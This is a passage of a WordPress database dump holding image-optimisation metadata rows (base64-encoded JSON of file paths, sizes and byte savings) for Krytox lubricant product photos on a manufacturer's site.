XBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1pbmR1c3RyaWFsLWdyZWFzZS1vaWwtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtaW5kdXN0cmlhbC1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMzM5LCJ0aW1lIjoxNDgzNTc5MjcyLCJpZCI6OTYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWluZHVzdHJpYWwtZ3JlYXNlLW9pbC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1pbmR1c3RyaWFsLWdyZWFzZS1vaWwtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtaW5kdXN0cmlhbC1ncmVhc2Utb2lsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1NjksInRpbWUiOjE0ODM1NzkyNzYsImlkIjo5NjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtaW5kdXN0cmlhbC1ncmVhc2Utb2lsLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWluZHVzdHJpYWwtZ3JlYXNlLW9pbC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1pbmR1c3RyaWFsLWdyZWFzZS1vaWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjc3NCwidGltZSI6MTQ4MzU3OTI3OSwiaWQiOjk2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1pbmR1c3RyaWFsLWdyZWFzZS1vaWwtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtaW5kdXN0cmlhbC1ncmVhc2Utb2lsLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWluZHVzdHJpYWwtZ3JlYXNlLW9pbC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTA5NiwidGltZSI6MTQ4MzU3OTI4MywiaWQiOjk2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1pbmR1c3RyaWFsLWdyZWFzZS1vaWwtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtaW5kdXN0cmlhbC1ncmVhc2Utb2lsLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWluZHVzdHJpYWwtZ3JlYXNlLW9pbC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTIxNCwidGltZSI6MTQ4MzU3OTI4NiwiaWQiOjk2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1pbmR1c3RyaWFsLWdyZWFzZS1vaWwtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtaW5kdXN0cmlhbC1ncmVhc2Utb2lsLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWluZHVzdHJpYWwtZ3JlYXNlLW9pbC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTU2MywidGltZSI6MTQ4MzU3OTI5MCwiaWQiOjk2MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29874, 959, 'wpfc_optimisation_reduction', '61005'); 
INSERT INTO `wp_postmeta` VALUES (29875, 959, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wuanBnIiwicmVkdWN0aW9uIjo2MDg3NywidGltZSI6MTQ4MzU3OTMwMiwiaWQiOiI5NTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTMwNiwiaWQiOjk1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzkzMDksImlkIjo5NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzEzLCJpZCI6OTU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzE3LCJpZCI6OTU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTMyMCwiaWQiOjk1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2wtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzkzMjIsImlkIjo5NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzI1LCJpZCI6OTU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTMyOCwiaWQiOjk1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzbC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTE2LCJ0aW1lIjoxNDgzNTc5MzMxLCJpZCI6OTU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzMzLCJpZCI6OTU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzM2LCJpZCI6OTU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzM5LCJpZCI6OTU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNsLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzQyLCJpZCI6OTU5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29876, 958, 'wpfc_optimisation_reduction', '3455743'); 
INSERT INTO `wp_postmeta` VALUES (29877, 958, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLmpwZyIsIndpZHRoIjo0Nzk4LCJoZWlnaHQiOjQ3OTgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2guanBnIiwicmVkdWN0aW9uIjozNDU1NjcyLCJ0aW1lIjoxNDgzNTc5MzU0LCJpZCI6Ijk1OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzU3LCJpZCI6OTU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC04MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC04MDB4ODAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTM2MSwiaWQiOjk1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2gtNzY4eDc2OC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjc2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2gtNzY4eDc2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2gtNzY4eDc2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzkzNjQsImlkIjo5NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTE2MDB4MTYwMC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTE2MDB4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzkzNjgsImlkIjo5NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW